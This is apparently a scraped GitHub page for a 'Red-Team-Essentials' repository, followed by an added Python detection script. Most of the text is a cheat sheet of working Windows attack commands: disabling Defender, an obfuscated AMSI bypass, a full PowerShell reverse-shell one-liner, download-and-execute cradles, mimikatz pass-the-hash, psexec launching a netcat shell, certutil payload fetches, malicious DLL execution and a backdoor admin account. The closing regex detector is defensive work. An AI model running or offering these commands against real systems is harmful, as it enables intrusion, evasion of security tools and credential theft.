hexachordanu / Red-Team-Essentials

Licence: other
This repo will contain some basic pentest/RT commands.

Projects that are alternatives of or similar to Red-Team-Essentials

Bigbountyrecon
BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation.
Stars: ✭ 541 (+2359.09%)
Mutual labels:  cybersecurity, pentesting, red-team
Sherlock
This script is designed to help expedite a web application assessment by automating some of the assessment steps (e.g., running nmap, sublist3r, metasploit, etc.)
Stars: ✭ 36 (+63.64%)
Mutual labels:  cybersecurity, red-team, red-team-engagement
Thecollective
The Collective. A repo for a collection of red-team projects found mostly on Github.
Stars: ✭ 85 (+286.36%)
Mutual labels:  cybersecurity, pentesting, red-team
Hack Tools
The all-in-one Red Team extension for Web Pentester 🛠
Stars: ✭ 2,750 (+12400%)
Mutual labels:  cybersecurity, pentesting, red-team
awesome-list-of-secrets-in-environment-variables
🦄🔒 Awesome list of secrets in environment variables 🖥️
Stars: ✭ 538 (+2345.45%)
Mutual labels:  cybersecurity, pentesting, red-team
linux-rootkits-red-blue-teams
Linux Rootkits (4.x Kernel)
Stars: ✭ 56 (+154.55%)
Mutual labels:  pentesting, red-team
Oscp Cheat Sheet
This is my OSCP cheat sheet made by combining a lot of different resources online with a little bit of tweaking. I used this cheat sheet during my exam (Fri, 13 Sep 2019) and during the labs. I can proudly say it helped me pass so I hope it can help you as well ! Good Luck and Try Harder
Stars: ✭ 216 (+881.82%)
Mutual labels:  cybersecurity, pentesting
InlineWhispers2
Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2
Stars: ✭ 156 (+609.09%)
Mutual labels:  red-team, red-team-engagement
ReversePowerShell
Functions that can be used to gain Reverse Shells with PowerShell
Stars: ✭ 48 (+118.18%)
Mutual labels:  cybersecurity, red-team
Jwtcat
A CPU-based JSON Web Token (JWT) cracker and - to some extent - scanner.
Stars: ✭ 181 (+722.73%)
Mutual labels:  cybersecurity, pentesting
github-watchman
Monitoring GitHub for sensitive data shared publicly
Stars: ✭ 60 (+172.73%)
Mutual labels:  cybersecurity, red-team
wifi-deauther
A fully automatic wifi deauther coded in Python
Stars: ✭ 25 (+13.64%)
Mutual labels:  cybersecurity, pentesting
Betterbackdoor
A backdoor with a multitude of features.
Stars: ✭ 195 (+786.36%)
Mutual labels:  cybersecurity, pentesting
Satellite
easy-to-use payload hosting
Stars: ✭ 193 (+777.27%)
Mutual labels:  cybersecurity, red-team
Caldera
Automated Adversary Emulation Platform
Stars: ✭ 3,126 (+14109.09%)
Mutual labels:  cybersecurity, red-team
LAZYPARIAH
A tool for generating reverse shell payloads on the fly.
Stars: ✭ 121 (+450%)
Mutual labels:  cybersecurity, red-team
dorothy
Dorothy is a tool to test security monitoring and detection for Okta environments
Stars: ✭ 85 (+286.36%)
Mutual labels:  cybersecurity, red-team
CTF-Writeups
Repository of my CTF writeups
Stars: ✭ 25 (+13.64%)
Mutual labels:  cybersecurity, pentesting
Oscp Pentest Methodologies
Assorted practical study materials for OSCP exam preparation / practical penetration-testing materials
Stars: ✭ 166 (+654.55%)
Mutual labels:  cybersecurity, pentesting
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (+681.82%)
Mutual labels:  cybersecurity, pentesting

Red-Team-Essentials

Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Services and startname

 Get-WmiObject win32_service | format-Table name, startname, startmode

Force-Change Password - GenericAll

Set-DomainObjectOwner -Identity stgadm -OwnerIdentity hexninja
Add-DomainObjectAcl -TargetIdentity stgadm -PrincipalIdentity hexninja
$newpass = ConvertTo-SecureString -String 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity stgadm -AccountPassword $newpass

Powershell Reverse Shell one Liner (AMSI Bypass)

$ip='192.168.1.114';$port=1337;$client = New-Object System.Net.Sockets.TCPClient -ArgumentList $ip, $port;$s = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};$l = "lol";Set-alias $l ([char]105 + [char]101 + [char]120);while(($i = $s.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (lol $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$s.Write($sendbyte,0,$sendbyte.Length);$s.Flush()};$client.Close()

Powershell Download in V4 and V5

 Invoke-WebRequest "http://10.10.15.58/hex.ps1" -OutFile "C:\Windows\TEMP\hex.ps1" 

PtH using mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:xyz.local /ntlm:ce03434e2f83b99704a631ae56e2146e /run:powershell.exe"'

psexec

./ps.exe \\\localip -h -accepteula -u username -p password cmd /c 'C:\nc.exe 192.168.50.138 4444 -e cmd.exe'

Check Powershell Version

 $PSVersionTable.PSVersion

Download File Powershell V2

(New-Object Net.WebClient).DownloadFile('http://10.10.15.58/powerview.ps1', 'C:\users\someuser\Desktop\powerview.ps1') 

Download Execute Powershell One Liner

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.58/payload.ps1')

AMSI Bypass

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Execute this on the target machine if you get rdesktop's CredSSP error while using remote desktop

 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Remote desktop login through domain user credentials

xfreerdp /u:username /d:adcorp.local /p:"passwordxyz" /v:TARGETIP

Download Execute powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.15.58/payload.ps1')|iex"

Pivoting using sshuttle when you have RSA keys

sshuttle -r root@TARGETIP -e "ssh -i rsa" TARGETIPRANGE.0/24

Adding user on windows cmd line & adding it to local admin group

net user hexninja lolbr654$@123 /ADD
net localgroup administrators hexninja /ADD

CertUtil Download remote file

certutil.exe -urlcache -f http://yourip/malicious.exe malicious.exe

CertUtil decode base64

certutil -decode malexecbase.b64 malexecutable.exe

regsvr32 to execute malicious DLL

regsvr32 /s /u .\exploit.dll

Net1 (you read it right; it's not net) - available functions similar to net

Net1 localgroup administrators
Net1 users

Where utility to search for config files and everything

Examples:
    WHERE /?
    WHERE myfilename1 myfile????.*
    WHERE $windir:*.*
    WHERE /R c:\windows *.exe *.dll *.bat
    WHERE /Q ??.???
    WHERE "c:\windows;c:\windows\system32:*.dll"
    WHERE /F /T *.dll
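
From the defender's side, several of the commands listed above leave recognizable process command lines. The following is an added example, not part of the original repository, that matches them in process-creation logs; the rule names and the sample command lines are constructed for illustration.

```python
import re

# Rule names are hypothetical labels; patterns mirror commands listed above.
RULES = [
    ("defender_realtime_disabled", re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I)),
    ("certutil_urlcache_download", re.compile(
        r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)),
    ("certutil_decode", re.compile(
        r"\bcertutil(\.exe)?\b.*[-/]decode\b", re.I)),
    # /s and /u may appear in either order, so use two lookaheads.
    ("regsvr32_silent_unregister", re.compile(
        r"\bregsvr32(\.exe)?\b(?=.*\s/s\b)(?=.*\s/u\b)", re.I)),
    ("powershell_download_cradle", re.compile(
        r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b).*https?://", re.I)),
    ("rdp_nla_disabled", re.compile(
        r"\breg(\.exe)?\s+add\b.*RDP-Tcp.*UserAuthentication.*/d\s+0\b", re.I)),
    ("local_account_created", re.compile(
        r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+.*\s/add\b", re.I)),
    ("local_admin_group_change", re.compile(
        r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
]

# Constructed process command lines (as seen in Sysmon Event ID 1 or
# Security Event ID 4688 with command-line auditing); benign ones included.
SAMPLE = [
    r"powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true",
    r"certutil.exe -urlcache -f http://10.10.15.58/a.exe a.exe",
    r"certutil -hashfile C:\Users\bob\report.docx SHA256",
    r"regsvr32 /s /u .\exploit.dll",
    r"regsvr32 /s C:\Windows\System32\scrrun.dll",
    r"powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.58/payload.ps1')",
    r"net1 localgroup administrators",
    r"net localgroup administrators hexninja /ADD",
]

def scan(command_lines):
    """Return (line_number, rule_name) for every rule that matches a line."""
    hits = []
    for n, line in enumerate(command_lines, start=1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((n, name))
    return hits

if __name__ == "__main__":
    for n, rule in scan(SAMPLE):
        print(f"line {n}: {rule}: {SAMPLE[n - 1]}")
```

String matching on command lines misses obfuscated forms such as the AMSI bypass above, so pair it with PowerShell script block logging (Event ID 4104).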